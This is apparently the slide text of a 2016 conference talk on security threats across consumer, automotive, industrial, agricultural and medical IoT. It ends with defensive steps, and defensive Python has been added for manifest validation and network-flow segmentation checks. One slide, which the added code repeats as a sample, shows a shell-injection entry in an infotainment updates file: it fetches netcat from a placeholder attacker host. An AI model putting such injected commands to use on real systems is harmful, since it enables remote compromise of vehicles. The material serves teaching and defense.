The of Threats BILLIONS OF WAYS THE IOT POSES AN INFOSEC CHALLENGE

Chris Poulin IoT Researcher, Futurist

CyberCrime 2016 Symposium: Cyber Convergence

The easiest way to hack an Airbus A319

• Maker
• Breaker
• Threat intel
• Data geek
• Provocateur
• TV & movies

Some questions to establish context

• What is your role wrt the IoT?
  • Personal consumer of the IoT
  • Enterprise manager of IT systems
  • A maker of IoT devices

• What is your biggest concern with the IoT?
  • Safety (e.g., HVAC systems gone wild)
  • Data privacy
  • Infrastructure security (e.g., IT comingling with IoT)
  • New enterprise attack vectors (e.g., end users with wearables)

Smart Home Device Examples: Home Security

• Security control and alarm panels
• Smart door locks
• Smart garage doors
• Motion detectors
• Window and door contacts
• Security cameras
• Smart doorbells

Smart Fridge
Smart Faucet
Smart Lighting
Smart Oven
Smart Dishwasher
Smart Utensils
Smart Television
Smart Wine

Smart Home Device Examples: Appliances, Lighting, Entertainment

• Appliances
  • Refrigerators and cooktops
  • Beds
  • Autonomous vacuums
• Lighting
  • Light bulbs (plain white and color changing)
  • Pathway lighting
  • Indoor and outdoor
• Entertainment
  • Smart televisions and DVRs
  • Audio systems

Smart Home Device Examples: Environment & Safety

Smart thermostats
Smoke / CO detectors
Smart air conditioners
Smart blinds
Water leak detectors
Baby monitors

Smart homes are vulnerable

“Buy V!gar4”

Your WiFi password is “fluffy123”

Why does home automation matter to enterprise IT security?

malware infected devices

Krebs: 620-650 Gbps
OVH: ~1 Tbps
Dyn: PayPal, Box, Slack, GitHub, Airbnb, Pinterest, Spotify, Yelp, Second Life, WWE Network

Smart Lighting
Concrete Monitors
Smart Doors
Smart Elevators

IIoT Device Examples: Building Automation

• Electric & water
• HVAC
• Security systems
• Lighting
• Elevators and escalators
• Polarized windows
• Earthquake absorbers
• Concrete mixing & curing

And they will be connected to your IT networks

IT Network
BAS Network

Connected Infrastructure
Connected Cars

IIoT Device Examples: Smart Cities & Municipalities

• Utilities
• Lighting
• Traffic flow
• Trash
• Air quality
• Violence detection

Connected vehicle threat surface

Bluetooth, WiFi, media players
Car Multimedia
OnStar, Uconnect, etc.
Dynamic Stability Control
Instrument Cluster / Telematics
Airbag Control Unit
Transmission Control Unit
Keyless Entry / Anti-theft
Engine Control Unit
OBD-II
Direct connection
RF channel
Anti-lock Braking System
Vehicle to Vehicle / Vehicle to Infrastructure Communications
Tire Pressure Monitor
RF channel
DSRC RF

IVIs are messy

Linux / Tizen / QNX

Audio module Apple CarPlay Telematics (open source?) module GPS module Video module Google Android (open source?) module WiFi module Voice module Microsoft Sync (open source?) module Update feature

…so let’s break one

updates.txt somepkg ‘; wget http://evil.org/nc; nc …
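The `updates.txt` entry above carries shell syntax inside a package name. The following Python is an added example, not code from the talk or from any IVI vendor: it shows the string-building pattern that makes such an entry dangerous beside a handler that validates names, builds an argument vector instead of a shell string, and rejects the whole manifest on one bad line. The one-name-per-line format, the name pattern and the `install-pkg` path are assumptions.

```python
import re

# Assumption: updates.txt lists one package name per line; the slide shows a single entry.
PKG_NAME = re.compile(r"[a-z0-9][a-z0-9+.-]{1,63}")
INSTALLER = "/usr/bin/install-pkg"  # hypothetical installer path

# Constructed manifest; line 2 is the entry shown on the slide.
SAMPLE_UPDATES = "audio-module\nsomepkg '; wget http://evil.org/nc; nc …\nnav-maps\n"

def unsafe_command(name):
    # 'Before' pattern: this string would be handed to a shell, which treats
    # the quote and ';' inside the name as syntax rather than data.
    return INSTALLER + " '" + name + "'"

def parse_manifest(text):
    """Split manifest text into (accepted names, [(line number, rejected text)])."""
    accepted, rejected = [], []
    for lineno, raw in enumerate(text.splitlines(), 1):
        name = raw.strip()
        if not name:
            continue
        if PKG_NAME.fullmatch(name):
            accepted.append(name)
        else:
            rejected.append((lineno, name))
    return accepted, rejected

def install_argv(name):
    """argv for subprocess.run(argv, shell=False): no shell ever parses the name."""
    if not PKG_NAME.fullmatch(name):
        raise ValueError("refusing package name %r" % name)
    return [INSTALLER, "--", name]

def plan_update(text):
    """Fail closed: one bad entry rejects the whole manifest."""
    accepted, rejected = parse_manifest(text)
    if rejected:
        raise ValueError("manifest rejected at line(s) %s" % [n for n, _ in rejected])
    return [install_argv(n) for n in accepted]
```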

Port 6667/TCP
SPI
V850
CAN bus

Number of latent vulnerabilities in a modern luxury vehicle

Using the Linux kernel as a comparative model (as of 10 Oct 2016)

• 15M lines of code in Linux Kernel
• 1,507 reported vulnerabilities
• ~10,000 latent vulnerabilities
• 1 vulnerability in every 9,954 lines of code

Source: http://www.cvedetails.com/vulnerability-list/vendor_id-33/product_id-47/Linux-Linux-Kernel.html

The perfect storm of resources & tools

Build your own vehicle hacking lab & test cart
eBay, SparkFun, etc.

Protocol decodes available

http://www.ioactive.com/pdfs/IOActive_Adventures_in_Automotive_Networks_and_Control_Units.pdf
http://illmatics.com/car_hacking_poories.pdf
http://marco.guardigli.it/2010/10/hacking-your-car.html
http://opengarages.org/handbook/

IIoT Device Examples: Heavy Industries

• Manufacturing:
  • Pumps
  • Conveyors
  • Robots

• Energy & Utilities:
  • Smart meters
  • Transformers
  • Pumps
  • Dam gates

Industrial IoT incidents

German steel mill

Stuxnet

Agricultural vulnerabilities

• Planters: seed depth
• Sprayers: dosage manipulation
• Silos: manipulate environment
• Livestock: feeding, drug, and environmental systems manipulation
• Milk: manipulate pasteurization and pH balance systems
• Hydroponics: manipulate environment
• Irrigation: manipulate control and data
• Seeds: manipulate environment
• Slaughter: remote control—effect? Who knows…
• Processing: manipulate waste system (reverse?)

IIoT Device Examples: Consumer Services

• Healthcare
  • X-ray machines
  • Chemistry analyzers
  • Pacemakers, insulin pumps

• Retail
  • Inventory tracking
  • Stocking & picking
  • Shipping

Healthcare: hacking a telesurgery unit

Wearable device examples

Google Glass
Android Wear
Fitness Trackers
Apple Watch
Insulin pumps
Pacemakers
Subcutaneous vitals monitor

Wearables security

Fitbit Bluetooth

Sync to PC

Malware: PC pwned!

Be Winston Wolfe. Solve problems.

“You’ve got a corpse in the car, minus a head. Take me to it.”

The layers of the IoT

Traditional IT Services & Security

IoT defense for IT security professionals (1 of 4)

1. Conduct an asset inventory

• Focus on critical assets and sensitive data

• NetFlow to passively identify assets

• VA scans to actively identify assets and add context

• RF scanning

• GQRX

• Scripting skilllz

IoT defense for IT security professionals (2 of 4)

2. Segment systems based on risk

• Enclave firewalls

• Software defined networks

3. Monitor & defend IoT devices on the network

• IDS / IPS

• NetFlow—look for anomalies

• Map relationships of wearables to mobile to users

IoT defense for IT security professionals (3 of 4)

4. Protect IT endpoints

• Endpoint protection software

• VA scanning / patching

• Phishing exercises

5. Collect logs and events from IoT devices

• Log management / SIEM

IoT defense for IT security professionals (4 of 4)

6. Update security policies to include IoT devices

7. Familiarize yourself with non-IT connected devices

Resources for makers

https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project
http://builditsecure.ly/
https://www.iamthecavalry.org/
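Steps 1 to 3 of the defense checklist (passive asset discovery from NetFlow, segmentation by risk, and watching flows for anomalies) can be combined in one pass over exported flow records. The Python below is an added example, not material from the talk; the subnets, inventory, allow-list and flow records are all constructed, and the four-field CSV layout is an assumed collector export.

```python
import ipaddress
from collections import defaultdict

# Assumed addressing; the slides name only an "IT Network" and a "BAS Network".
SEGMENTS = {"it": ipaddress.ip_network("10.10.0.0/16"),
            "bas": ipaddress.ip_network("10.20.0.0/16")}
KNOWN_ASSETS = {"10.10.1.5", "10.10.1.9", "10.20.0.11"}  # constructed inventory
ALLOWED_CROSS = {("10.20.0.11", "10.10.1.5", 443)}       # constructed allow-list

# Constructed flow records: src,dst,dst_port,bytes
FLOWS = """10.10.1.9,10.10.1.5,443,18200
10.20.0.11,10.10.1.5,443,9100
10.20.0.37,10.20.0.11,47808,640
10.20.0.37,10.10.1.9,23,5120
10.20.0.37,203.0.113.80,443,880000"""

def segment_of(ip):
    addr = ipaddress.ip_address(ip)
    return next((n for n, net in SEGMENTS.items() if addr in net), "external")

def analyze(flow_text):
    """Return (inventory, findings) from flow records alone, without probing any device."""
    inventory = defaultdict(lambda: {"segment": "", "peers": set(), "bytes_out": 0})
    findings = []
    for line in flow_text.splitlines():
        src, dst, port, nbytes = line.split(",")
        port, nbytes = int(port), int(nbytes)
        s_seg, d_seg = segment_of(src), segment_of(dst)
        for ip, seg in ((src, s_seg), (dst, d_seg)):
            if seg != "external":
                inventory[ip]["segment"] = seg   # step 1: passive discovery
        if s_seg != "external":
            inventory[src]["peers"].add((dst, port))
            inventory[src]["bytes_out"] += nbytes
        # Steps 2 and 3: a building-automation host leaving its segment is a
        # finding unless that exact flow is on the allow-list.
        if s_seg == "bas" and d_seg != "bas" and (src, dst, port) not in ALLOWED_CROSS:
            findings.append(("segment-violation", src, dst, port))
    for ip in sorted(inventory):
        if ip not in KNOWN_ASSETS:               # seen on the wire, not in inventory
            findings.append(("unknown-asset", ip, inventory[ip]["segment"], None))
    return dict(inventory), findings
```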